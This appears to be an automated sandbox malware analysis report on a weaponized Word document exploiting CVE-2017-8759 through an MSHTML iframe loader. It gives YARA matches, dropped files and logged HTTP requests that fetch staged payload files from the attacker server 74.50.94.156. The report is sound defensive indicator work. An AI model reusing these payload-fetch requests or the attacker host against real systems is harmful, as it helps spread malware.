Edit tour

Windows Analysis Report
Overview_of_UWCs_UkraineInNATO_campaign.docx.doc

Overview

General Information

Sample Name:	Overview_of_UWCs_UkraineInNATO_campaign.docx.doc
Analysis ID:	1266120
MD5:	d227874863036b8e73a3894a19bd25a0
SHA1:	2400b169ee2c38ac146c67408debc9b4fa4fca5f
SHA256:	a61b2eafcf39715031357df6b01e85e0d1ea2e8ee1dfec241b114e18f7a1163f
Tags:	74-50-94-156docdocxHUN
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected iframe remote loader

Malicious sample detected (through community Yara rule)

Yara detected RTF with hardcoded OLE link

Yara detected RTF with MSHTML iframe injection

Document Viewer accesses SMB path (likely to steal NTLM hashes or to download payload)

Microsoft Office drops suspicious files

Opens network shares

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Potential document exploit detected (performs HTTP gets)

Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2008 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

cleanup

Malware Configuration

⊘No configs have been found

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
afchunk.rtf	JoeSecurity_RTFWithhardcodedUrlOLElink	Yara detected RTF with hardcoded OLE link	Joe Security
afchunk.rtf	INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2	detects CVE-2017-8759 weaponized RTF documents.	ditekSHen	0xa018:$clsid3: 4d73786d6c322e534158584d4c5265616465722e 0x3eab:$ole2: D0CF11E0A1B11AE1 0xa060:$ole2: d0cf11e0a1b11ae1 0x26d6:$obj2: \objdata 0x3e60:$obj2: \objdata 0x2683:$obj3: \objupdate 0x2678:$obj5: \objautlink 0x3de2:$obj5: \objautlink

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.url	JoeSecurity_RTFMSHTMLIFRAME	Yara detected RTF with MSHTML iframe injection	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RFile[1].htm	JoeSecurity_iframeloadingfromremoteserver	Yara detected iframe remote loader	Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2940191.url	JoeSecurity_RTFMSHTMLIFRAME	Yara detected RTF with MSHTML iframe injection	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Yara detected iframe remote loader

Source: Yara match

File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RFile[1].htm, type: DROPPED

Yara detected RTF with hardcoded OLE link

Source: Yara match

File source: afchunk.rtf, type: SAMPLE

Yara detected RTF with MSHTML iframe injection

Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.url, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2940191.url, type: DROPPED

Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 74.50.94.156:80 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80

Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 74.50.94.156:80

Source: global traffic	HTTP traffic detected: GET /MSHTML_C7/start.xml HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /MSHTML_C7/RFile.asp HTTP/1.1Accept: /Referer: http://74.50.94.156/MSHTML_C7/start.xmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /MSHTML_C7/zip_k.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /MSHTML_C7/zip_k2.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=NPCBNNGBNHGFPJKACNKBNHNL
Source: global traffic	HTTP traffic detected: GET /MSHTML_C7/zip_k3.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=NPCBNNGBNHGFPJKACNKBNHNL

Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156
Source: unknown	TCP traffic detected without corresponding DNS query: 74.50.94.156

Source: ~WRS{E91871FC-BFD2-4C90-871A-4BA39F60B253}.tmp.0.dr	String found in binary or memory: http://74.50.94.156/MSHTML_C7/start.xml
Source: ~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp.0.dr	String found in binary or memory: http://74.50.94.156/MSHTML_C7/start.xmlyX

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C7C2C44C-1140-4E43-A415-F39DE2B8E989}.tmp

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /MSHTML_C7/start.xml HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /MSHTML_C7/RFile.asp HTTP/1.1Accept: /Referer: http://74.50.94.156/MSHTML_C7/start.xmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /MSHTML_C7/zip_k.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /MSHTML_C7/zip_k2.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=NPCBNNGBNHGFPJKACNKBNHNL
Source: global traffic	HTTP traffic detected: GET /MSHTML_C7/zip_k3.asp?d=84.17.52.5_bc8d1_ HTTP/1.1Accept: /Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 74.50.94.156Connection: Keep-AliveCookie: ASPSESSIONIDCSTDATTC=NPCBNNGBNHGFPJKACNKBNHNL

System Summary

Malicious sample detected (through community Yara rule)

Source: afchunk.rtf, type: SAMPLE

Matched rule: detects CVE-2017-8759 weaponized RTF documents. Author: ditekSHen

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F2940191.url			Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\file001.url			Jump to behavior

Source: afchunk.rtf, type: SAMPLE

Matched rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2 author = ditekSHen, description = detects CVE-2017-8759 weaponized RTF documents.

Source: ~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: Overview_of_UWCs_UkraineInNATO_campaign.docx.LNK.0.dr

LNK file: ..\..\..\..\..\Desktop\Overview_of_UWCs_UkraineInNATO_campaign.docx.doc

Source: F2940191.url.0.dr	OLE indicator, Word Document stream: true
Source: file001.url.0.dr	OLE indicator, Word Document stream: true

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$erview_of_UWCs_UkraineInNATO_campaign.docx.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRAB9.tmp

Jump to behavior

Source: classification engine

Classification label: mal84.spyw.expl.evad.winDOC@1/34@0/1

Source: F2940191.url.0.dr	OLE document summary: title field not present or empty
Source: F2940191.url.0.dr	OLE document summary: edited time not present or 0
Source: file001.url.0.dr	OLE document summary: title field not present or empty
Source: file001.url.0.dr	OLE document summary: edited time not present or 0
Source: ~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{66724ADB-9929-43E8-BB9C-9B934837700D}.tmp.0.dr	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: F2940191.url.0.dr

Initial sample: OLE indicators vbamacros = False

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
